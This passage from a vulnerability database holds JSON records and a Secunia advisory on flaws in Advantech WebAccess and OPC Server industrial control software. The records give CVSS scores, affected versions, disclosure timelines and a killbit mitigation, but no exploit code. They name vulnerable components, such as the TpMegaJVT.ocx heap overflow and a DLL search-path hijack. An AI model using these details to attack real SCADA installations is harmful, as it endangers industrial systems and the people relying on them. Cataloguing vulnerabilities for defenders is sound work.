WebAccess nvA1Media Connect MediaURL Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ], "trust": 0.7 } }
var-201708-1697
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-544", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-544", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4090", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-544", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ] }, "id": "VAR-201708-1697", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:52:36.384000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-544", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-544", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-544", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT setGroupIp Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-544" } ], "trust": 0.7 } }
var-201708-1127
Vulnerability from variot
An Uncontrolled Search Path Element issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A maliciously crafted dll file placed earlier in the search path may allow an attacker to execute code within the context of the application. Advantech WebAccess Contains a vulnerability related to uncontrolled search path elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1127", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007578" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12717", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-12717", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CNVD-2017-23878", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "4ef81914-2abc-4800-b27a-606bafafb9a9", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-103267", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-12717", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12717", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12717", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-23878", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201708-1274", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103267", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "VULHUB", "id": "VHN-103267" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Uncontrolled Search Path Element issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A maliciously crafted dll file placed earlier in the search path may allow an attacker to execute code within the context of the application. Advantech WebAccess Contains a vulnerability related to uncontrolled search path elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12717" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "VULHUB", "id": "VHN-103267" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12717", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1274", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23878", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007578", "trust": 0.8 }, { "db": "IVD", "id": "4EF81914-2ABC-4800-B27A-606BAFAFB9A9", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103267", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "VULHUB", "id": "VHN-103267" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "id": "VAR-201708-1127", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "VULHUB", "id": "VHN-103267" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" } ] }, "last_update_date": "2024-11-23T21:53:49.729000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess arbitrary code execution vulnerability (CNVD-2017-23878)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101162" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74363" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-427", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103267" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12717" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12717" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "VULHUB", "id": "VHN-103267" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNVD", "id": "CNVD-2017-23878" }, { "db": "VULHUB", "id": "VHN-103267" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "db": "NVD", "id": "CVE-2017-12717" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23878" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103267" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "date": "2017-08-30T18:29:01.077000", "db": "NVD", "id": "CVE-2017-12717" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-23878" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103267" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-12-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007578" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1274" }, { "date": "2024-11-21T03:10:05.233000", "db": "NVD", "id": "CVE-2017-12717" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1274" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerabilities in uncontrolled search path elements", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007578" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code problem", "sources": [ { "db": "IVD", "id": "4ef81914-2abc-4800-b27a-606bafafb9a9" }, { "db": "CNNVD", "id": "CNNVD-201708-1274" } ], "trust": 0.8 } }
var-201202-0216
Vulnerability from variot
Advantech/BroadWin WebAccess 7.0 and earlier allows remote attackers to obtain sensitive information via a direct request to a URL. NOTE: the vendor reportedly "does not consider it to be a security risk.". Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess submits a specially crafted URL that does not authenticate users with access to restricted information. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. Vulnerabilities exist in Advantech/BroadWin WebAccess 7.0 and earlier versions. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0216", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1977818e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0665" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001554" }, { "db": "CNNVD", "id": "CNNVD-201202-412" }, { "db": "NVD", "id": "CVE-2012-0236" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001554" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { 